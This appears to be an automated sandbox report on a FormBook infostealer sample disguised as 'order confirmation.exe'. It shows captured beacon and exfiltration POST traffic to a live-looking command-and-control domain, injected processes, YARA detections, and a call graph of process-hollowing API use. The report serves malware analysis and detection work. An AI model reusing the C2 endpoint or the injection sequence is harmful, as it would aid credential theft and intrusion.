                                                  Data Ascii: KX=AzG7TTHt+g90MJQ6LY7+1hXnX35zrmiwj0xm38+/F2kZQHr7Nsfiv1cTa8dON/ArQkbNJUdIMMv3uTVnEkoVRZCOPqlBS6qdTyTlcSf9VPwITm4deDeDysSKdONrCDm1fIIpWsvEIBmjRwb/1/w1caFnppREtV5AkzVmYlfA76FemhF+iU+pTiW1rE55CECJ9oTyFjQ=
                                                  Dec 14, 2024 13:51:30.429028034 CET904INHTTP/1.1 404 Not Found
                                                  Date: Sat, 14 Dec 2024 12:51:30 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yK8E%2B8UBoJRuCE4OSXsnnXc3Ych%2Fhv2j0OlMsLkw3cvTGlAbOmraMdY7C%2BaL8FJE5zkYyCItsvnMjLqT34%2B7QP0maBRCqbCFYYV2cBzNwZJmms%2FVTfuNAp0rowzvARfAwSqq8vqDY1Q%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8f1e5361c80043c2-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1678&rtt_var=839&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=788&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.849860104.21.90.137802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:51:31.956368923 CET808OUTPOST /eaqq/ HTTP/1.1
                                                  Host: www.ana-silverco.shop
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.ana-silverco.shop
                                                  Content-Length: 223
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.ana-silverco.shop/eaqq/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 41 7a 47 37 54 54 48 74 2b 67 39 30 4f 70 67 36 51 37 44 2b 35 52 58 6b 59 58 35 7a 35 6d 6a 59 6a 30 4e 6d 33 39 71 76 43 45 77 5a 51 6d 62 37 4d 74 66 69 73 31 63 54 51 63 64 50 44 66 41 67 51 6b 47 77 4a 56 68 49 4d 4d 72 33 75 53 6c 6e 46 55 55 57 54 4a 43 4d 61 36 6c 44 63 61 71 64 54 79 54 6c 63 53 4b 71 56 50 6f 49 54 57 49 64 59 69 65 63 38 4d 53 4a 4e 2b 4e 72 52 54 6e 38 66 49 49 78 57 74 7a 75 49 44 65 6a 52 77 4c 2f 30 75 77 32 4a 4b 46 68 32 5a 51 7a 6d 47 63 62 74 68 5a 43 59 45 62 59 38 49 78 66 6e 58 30 55 34 32 32 76 51 69 2b 65 72 48 52 50 48 7a 66 68 6e 4c 44 43 62 30 46 41 36 55 4b 6e 66 56 36 37 7a 4e 50 44 58 61 31 50 43 48 37 68
                                                  Data Ascii: KX=AzG7TTHt+g90Opg6Q7D+5RXkYX5z5mjYj0Nm39qvCEwZQmb7Mtfis1cTQcdPDfAgQkGwJVhIMMr3uSlnFUUWTJCMa6lDcaqdTyTlcSKqVPoITWIdYiec8MSJN+NrRTn8fIIxWtzuIDejRwL/0uw2JKFh2ZQzmGcbthZCYEbY8IxfnX0U422vQi+erHRPHzfhnLDCb0FA6UKnfV67zNPDXa1PCH7h
                                                  Dec 14, 2024 13:51:33.099092960 CET898INHTTP/1.1 404 Not Found
                                                  Date: Sat, 14 Dec 2024 12:51:32 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KfRJUbqGH0yvBdTV9ZcLlgsOh3ochM2JEFIPFVa2BBbnuKUaaxJWYuc4jGWuSucqHv35cCu3NSx52XfBbxdz7p7d5dQ2ghy48LpPv9ibygaW3XWJ9%2FAaOvYpnThrgozxWPwOr%2B3dbiI%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8f1e53727bec435e-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1706&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=808&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  15192.168.2.849866104.21.90.137802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:51:34.628195047 CET1825OUTPOST /eaqq/ HTTP/1.1
                                                  Host: www.ana-silverco.shop
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.ana-silverco.shop
                                                  Content-Length: 1239
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.ana-silverco.shop/eaqq/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 41 7a 47 37 54 54 48 74 2b 67 39 30 4f 70 67 36 51 37 44 2b 35 52 58 6b 59 58 35 7a 35 6d 6a 59 6a 30 4e 6d 33 39 71 76 43 45 6f 5a 51 78 7a 37 4e 4f 33 69 74 31 63 54 57 73 64 43 44 66 41 35 51 6b 66 37 4a 56 74 59 4d 4a 33 33 75 77 74 6e 4d 47 77 57 61 4a 43 4d 46 4b 6c 47 53 36 71 45 54 32 2f 68 63 52 79 71 56 50 6f 49 54 56 51 64 66 7a 65 63 2b 4d 53 4b 64 4f 4e 2f 43 44 6d 56 66 4a 67 50 57 74 33 55 49 79 2b 6a 51 52 37 2f 35 34 4d 32 55 36 46 6a 31 5a 51 72 6d 47 67 2b 74 68 46 6f 59 45 76 69 38 4b 52 66 6d 43 56 30 67 57 79 4c 55 6a 66 75 6a 32 42 35 65 43 4c 6d 6b 64 54 78 55 58 6b 67 32 7a 36 37 58 6d 2b 70 32 61 76 48 4e 76 78 73 4f 48 71 68 4f 68 31 6f 34 52 39 6a 43 6e 57 79 6c 63 6c 64 36 35 52 2f 36 57 48 55 42 5a 71 59 6d 45 43 50 32 59 56 33 67 4e 56 30 4d 76 6a 4b 75 58 61 4b 2b 31 34 66 42 4a 5a 62 75 72 34 59 71 46 47 6f 54 63 50 43 68 41 4b 43 36 35 6f 79 73 2b 67 54 51 4f 69 43 2b 76 49 73 64 4c 35 34 55 71 64 67 41 78 49 79 49 64 72 6a 43 44 4d 70 77 4c 76 5a 42 4a 42 [TRUNCATED]
                                                  Data Ascii: KX=AzG7TTHt+g90Opg6Q7D+5RXkYX5z5mjYj0Nm39qvCEoZQxz7NO3it1cTWsdCDfA5Qkf7JVtYMJ33uwtnMGwWaJCMFKlGS6qET2/hcRyqVPoITVQdfzec+MSKdON/CDmVfJgPWt3UIy+jQR7/54M2U6Fj1ZQrmGg+thFoYEvi8KRfmCV0gWyLUjfuj2B5eCLmkdTxUXkg2z67Xm+p2avHNvxsOHqhOh1o4R9jCnWylcld65R/6WHUBZqYmECP2YV3gNV0MvjKuXaK+14fBJZbur4YqFGoTcPChAKC65oys+gTQOiC+vIsdL54UqdgAxIyIdrjCDMpwLvZBJBQZqmTsg/2NsQYOJFD1foePj9IWnHgF9egOsYdHIL9u2tGvH/GjQzhvxpQ+NRKrR6EsKDenYeKiDsXqgs6/RMb+Rki8HwpvM8y/oorfV8YDnFy7Pc9Abpr4togc8osTQl4Wde0Sg4y9S+D3OwZLmc80kF2zLkEtoi9gm7hP2A2LEvOeLI1p+02isB4jbAFNNYCVzphRUHHVnhhgVv9D4KDC7kv6MYJyv2GeiI6GE2+AGadduCkvKejxyOmS9SQ9CHrWaZzIwb0AQ/piIoMB47I0W9xLHJPVHYB3xYKIK2LMWKF1Y/IEdvwic39IDWbUyT3CJpuq+f/1VmbvGzijoZUrcduZpskmDrEV4OWuDL9VTz5o+yLaHfvaQUMla1ziXN8cLrPGv/UMBsYDPxwiKCv9COTjqLmweE3GIC1iTAv4xlAOuuQrREIsYE0YpeX/LrV/W6TNJDHrMD5krZS5/JvLe8msyIUM7jaqGOlTNCKJbHxIKvwqDVcLXZhmdvSWiuCyYHPBtVN5VQ9TkkZjZ0wOOOFSaSQI2fM9islIANMoJqTs9xgLAxvRhaTWCRCeMTId8jBOyhg7BdxCpPUQxNK77kvtEuaG7qMGpvgINKM2eTa3sE1on2iFQaWTjljy8JKu+3ndd3TjbrvFudRJfoJyUfMf54YKrSDY [TRUNCATED]
                                                  Dec 14, 2024 13:51:35.774682999 CET904INHTTP/1.1 404 Not Found
                                                  Date: Sat, 14 Dec 2024 12:51:35 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8d%2BxpHOsorakXoxc6p6pSeCntTTnPXUKwqtys3ACiUgOHSL7yfLWEFfSuxnqKihgQqY8GOBESJ9CuBXQbVLV6NbYw4IUrRXq%2BeejTNbcZh3LVLFNy8csV%2BuntGpBZzE%2BM2wO7HJr4oI%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8f1e53833d127293-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2099&min_rtt=2099&rtt_var=1049&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1825&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16192.168.2.849877104.21.90.13780
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:51:37.903799057 CET529OUTGET /eaqq/?KX=NxubQmq32TFwA/AibIzR7zP/ZxBDpVn2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kYqX2P65hLvXSZ3fWNCCIV/k5d2IdbBS66sOXN5gLen/wBg==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1
                                                  Host: www.ana-silverco.shop
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.5
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Dec 14, 2024 13:51:39.037941933 CET848INHTTP/1.1 404 Not Found
                                                  Date: Sat, 14 Dec 2024 12:51:38 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1FD134R3%2BCEJSevsZ9VEl5FVBIJrcxP%2FnXm3fRXbhgEAMfmmIezQ905Z1AJE%2FQOiSxybGgBVulvi1GkOX%2B1Ls16yVmupTVi3t915VSiLhSsYDizOdv9CsXN7X2rXCDfRfm6CgSm0m40%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8f1e5397aa5841af-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2211&min_rtt=2211&rtt_var=1105&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=529&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:07:49:28
                                                  Start date:14/12/2024
                                                  Path:C:\Users\user\Desktop\order confirmation.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\order confirmation.exe"
                                                  Imagebase:0xfd0000
                                                  File size:835'584 bytes
                                                  MD5 hash:8D4459233467BBCF973541C6B17091D7
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:07:49:37
                                                  Start date:14/12/2024
                                                  Path:C:\Users\user\Desktop\order confirmation.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\order confirmation.exe"
                                                  Imagebase:0x3a0000
                                                  File size:835'584 bytes
                                                  MD5 hash:8D4459233467BBCF973541C6B17091D7
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:07:49:37
                                                  Start date:14/12/2024
                                                  Path:C:\Users\user\Desktop\order confirmation.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\order confirmation.exe"
                                                  Imagebase:0x850000
                                                  File size:835'584 bytes
                                                  MD5 hash:8D4459233467BBCF973541C6B17091D7
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1983228417.0000000001310000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1984356146.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:8
                                                  Start time:07:50:01
                                                  Start date:14/12/2024
                                                  Path:C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe"
                                                  Imagebase:0xeb0000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2820915719.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:9
                                                  Start time:07:50:03
                                                  Start date:14/12/2024
                                                  Path:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\SearchProtocolHost.exe"
                                                  Imagebase:0xa30000
                                                  File size:340'992 bytes
                                                  MD5 hash:727FE964E574EEAF8917308FFF0880DE
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2821333990.0000000003270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2821409903.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:moderate
                                                  Has exited:false

                                                  General

                                                  Target ID:10
                                                  Start time:07:50:17
                                                  Start date:14/12/2024
                                                  Path:C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe"
                                                  Imagebase:0xeb0000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2823935651.0000000004EB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:12
                                                  Start time:07:50:30
                                                  Start date:14/12/2024
                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x7ff7d0b40000
                                                  File size:676'768 bytes
                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:10.8%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:1.5%
                                                    Total number of Nodes:200
                                                    Total number of Limit Nodes:11
                                                    execution_graph 40968 7d95a18 40969 7d95a21 CloseHandle 40968->40969 40970 7d95a87 40969->40970 41019 7d929a8 41020 7d929e2 41019->41020 41021 7d92a5e 41020->41021 41022 7d92a73 41020->41022 41027 7d911fc 41021->41027 41023 7d911fc 3 API calls 41022->41023 41025 7d92a82 41023->41025 41029 7d91207 41027->41029 41028 7d92a69 41029->41028 41032 7d93468 41029->41032 41037 7d93457 41029->41037 41033 7d93482 41032->41033 41042 7d91254 41032->41042 41035 7d934b6 CreateIconFromResourceEx 41033->41035 41036 7d9348f 41033->41036 41035->41036 41036->41028 41038 7d91254 CreateIconFromResourceEx 41037->41038 41039 7d93482 41038->41039 41040 7d9348f 41039->41040 41041 7d934b6 CreateIconFromResourceEx 41039->41041 41040->41028 41041->41040 41043 7d934b8 CreateIconFromResourceEx 41042->41043 41044 7d93536 41043->41044 41044->41033 40971 174afb0 40972 174afb1 40971->40972 40976 174b0a8 40972->40976 40981 174b098 40972->40981 40973 174afbf 40978 174b0a9 40976->40978 40977 174b0dc 40977->40973 40978->40977 40979 174b2e0 GetModuleHandleW 40978->40979 40980 174b30d 40979->40980 40980->40973 40983 174b09c 40981->40983 40982 174b0dc 40982->40973 40983->40982 40984 174b2e0 GetModuleHandleW 40983->40984 40985 174b30d 40984->40985 40985->40973 41045 174d340 41046 174d386 GetCurrentProcess 41045->41046 41048 174d3d1 41046->41048 41049 174d3d8 GetCurrentThread 41046->41049 41048->41049 41050 174d415 GetCurrentProcess 41049->41050 41051 174d40e 41049->41051 41052 174d44b 41050->41052 41051->41050 41053 174d473 GetCurrentThreadId 41052->41053 41054 174d4a4 41053->41054 41006 8261040 41007 8261066 41006->41007 41008 82611cb 41006->41008 41007->41008 41011 82612c0 PostMessageW 41007->41011 41013 82612b8 PostMessageW 41007->41013 41012 826132c 41011->41012 41012->41007 41014 826132c 41013->41014 41014->41007 41055 7d8f6a0 41056 7d8f6ba 41055->41056 41057 7d8f6c2 41056->41057 41075 82600a7 41056->41075 41081 8260498 41056->41081 41085 82600d8 41056->41085 41090 82600fa 41056->41090 41095 82601df 41056->41095 41100 8260355 41056->41100 41105 8260294 41056->41105 41116 8260394 41056->41116 41124 826054c 41056->41124 41129 82603e1 41056->41129 41138 8260221 41056->41138 41143 82609c0 41056->41143 41148 8260160 41056->41148 41154 82607a3 41056->41154 41159 8260203 41056->41159 41164 8260305 41056->41164 41169 82602c4 41056->41169 41076 82600aa 41075->41076 41077 82600dd 41075->41077 41177 7d8e898 41077->41177 41181 7d8e88c 41077->41181 41185 7d8e038 41081->41185 41189 7d8e040 41081->41189 41082 82604b2 41082->41057 41086 82600e4 41085->41086 41088 7d8e898 CreateProcessA 41086->41088 41089 7d8e88c CreateProcessA 41086->41089 41087 82601c0 41087->41057 41088->41087 41089->41087 41091 8260107 41090->41091 41093 7d8e898 CreateProcessA 41091->41093 41094 7d8e88c CreateProcessA 41091->41094 41092 82601c0 41092->41057 41093->41092 41094->41092 41096 82601eb 41095->41096 41193 7d8df8a 41096->41193 41197 7d8df90 41096->41197 41097 82605b7 41097->41057 41101 82601eb 41100->41101 41103 7d8df8a ResumeThread 41101->41103 41104 7d8df90 ResumeThread 41101->41104 41102 82605b7 41102->41057 41103->41102 41104->41102 41201 7d8e548 41105->41201 41205 7d8e550 41105->41205 41106 82602b2 41107 82603d0 41106->41107 41108 82601eb 41106->41108 41209 7d8e610 41106->41209 41213 7d8e60e 41106->41213 41107->41057 41114 7d8df8a ResumeThread 41108->41114 41115 7d8df90 ResumeThread 41108->41115 41109 82605b7 41109->41057 41114->41109 41115->41109 41117 826039a 41116->41117 41122 7d8e60e WriteProcessMemory 41117->41122 41123 7d8e610 WriteProcessMemory 41117->41123 41118 82601eb 41120 7d8df8a ResumeThread 41118->41120 41121 7d8df90 ResumeThread 41118->41121 41119 82605b7 41119->41057 41120->41119 41121->41119 41122->41118 41123->41118 41125 826056f 41124->41125 41127 7d8e60e WriteProcessMemory 41125->41127 41128 7d8e610 WriteProcessMemory 41125->41128 41126 8260b8f 41127->41126 41128->41126 41130 82603e7 41129->41130 41131 82603d0 41130->41131 41132 82601eb 41130->41132 41136 7d8e60e WriteProcessMemory 41130->41136 41137 7d8e610 WriteProcessMemory 41130->41137 41131->41057 41134 7d8df8a ResumeThread 41132->41134 41135 7d8df90 ResumeThread 41132->41135 41133 82605b7 41133->41057 41134->41133 41135->41133 41136->41130 41137->41130 41139 82601eb 41138->41139 41140 8260257 41139->41140 41141 7d8df8a ResumeThread 41139->41141 41142 7d8df90 ResumeThread 41139->41142 41140->41057 41141->41140 41142->41140 41144 8260bae 41143->41144 41146 7d8e038 Wow64SetThreadContext 41144->41146 41147 7d8e040 Wow64SetThreadContext 41144->41147 41145 8260bc9 41146->41145 41147->41145 41149 82600e4 41148->41149 41150 8260caf 41149->41150 41152 7d8e898 CreateProcessA 41149->41152 41153 7d8e88c CreateProcessA 41149->41153 41151 82601c0 41151->41057 41152->41151 41153->41151 41155 82601eb 41154->41155 41157 7d8df8a ResumeThread 41155->41157 41158 7d8df90 ResumeThread 41155->41158 41156 82605b7 41156->41057 41157->41156 41158->41156 41160 8260209 41159->41160 41161 82605b7 41160->41161 41162 7d8df8a ResumeThread 41160->41162 41163 7d8df90 ResumeThread 41160->41163 41161->41057 41162->41161 41163->41161 41165 826021a 41164->41165 41166 8260312 41164->41166 41165->41166 41167 7d8df8a ResumeThread 41165->41167 41168 7d8df90 ResumeThread 41165->41168 41166->41057 41167->41166 41168->41166 41217 7d8e6f8 41169->41217 41221 7d8e700 41169->41221 41170 8260b16 41171 82601eb 41171->41170 41175 7d8df8a ResumeThread 41171->41175 41176 7d8df90 ResumeThread 41171->41176 41172 82605b7 41172->41057 41175->41172 41176->41172 41178 7d8e89d CreateProcessA 41177->41178 41180 7d8eae3 41178->41180 41182 7d8e898 CreateProcessA 41181->41182 41184 7d8eae3 41182->41184 41186 7d8e085 Wow64SetThreadContext 41185->41186 41188 7d8e0cd 41186->41188 41188->41082 41190 7d8e085 Wow64SetThreadContext 41189->41190 41192 7d8e0cd 41190->41192 41192->41082 41194 7d8dfd0 ResumeThread 41193->41194 41196 7d8e001 41194->41196 41196->41097 41198 7d8dfd0 ResumeThread 41197->41198 41200 7d8e001 41198->41200 41200->41097 41202 7d8e590 VirtualAllocEx 41201->41202 41204 7d8e5cd 41202->41204 41204->41106 41206 7d8e590 VirtualAllocEx 41205->41206 41208 7d8e5cd 41206->41208 41208->41106 41210 7d8e658 WriteProcessMemory 41209->41210 41212 7d8e6af 41210->41212 41212->41106 41214 7d8e658 WriteProcessMemory 41213->41214 41216 7d8e6af 41214->41216 41216->41106 41218 7d8e74b ReadProcessMemory 41217->41218 41220 7d8e78f 41218->41220 41220->41171 41222 7d8e74b ReadProcessMemory 41221->41222 41224 7d8e78f 41222->41224 41224->41171 41015 7d9c9b0 41016 7d9c9fe DrawTextExW 41015->41016 41018 7d9ca56 41016->41018 40986 1744668 40987 1744672 40986->40987 40989 1744758 40986->40989 40990 174475c 40989->40990 40994 1744868 40990->40994 40998 1744859 40990->40998 40995 174488f 40994->40995 40996 174496c 40995->40996 41002 1744514 40995->41002 41000 174485c 40998->41000 40999 174496c 40999->40999 41000->40999 41001 1744514 CreateActCtxA 41000->41001 41001->40999 41003 17458f8 CreateActCtxA 41002->41003 41005 17459bb 41003->41005 41225 174d588 DuplicateHandle 41226 174d61e 41225->41226

                                                    Executed Functions

                                                    Function 07D911FC Relevance: .7, Instructions: 652COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 17fe2c70720d8dbc2f7c74cfe66b77ebca4f0d30fc6a6e1423692024b8c1d251
                                                    • Instruction ID: 45212d066d561fe5a5cae65435515a10c9f71c311b51fc58ada163804c3ce07d
                                                    • Opcode Fuzzy Hash: 17fe2c70720d8dbc2f7c74cfe66b77ebca4f0d30fc6a6e1423692024b8c1d251
                                                    • Instruction Fuzzy Hash: F5424D70A002199FDF54DFA9C89079EBBF2FF88300F14856AD44AAB355DB34AD45CBA1
                                                    Function 07D98930 Relevance: .5, Instructions: 520COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9d8c37bcc8f2fd32f4ba5245d43821d8c0abb65b18272a46058704c5da6773ab
                                                    • Instruction ID: e25714d3a21acfc54ccc0af91fe94fe235d3c9dc23b604cc78b3feae425f89e6
                                                    • Opcode Fuzzy Hash: 9d8c37bcc8f2fd32f4ba5245d43821d8c0abb65b18272a46058704c5da6773ab
                                                    • Instruction Fuzzy Hash: D9225971A10219CFDF14DF68D884A9DFBB2FF85310F1585A9E909AB225DB30AD85CF90
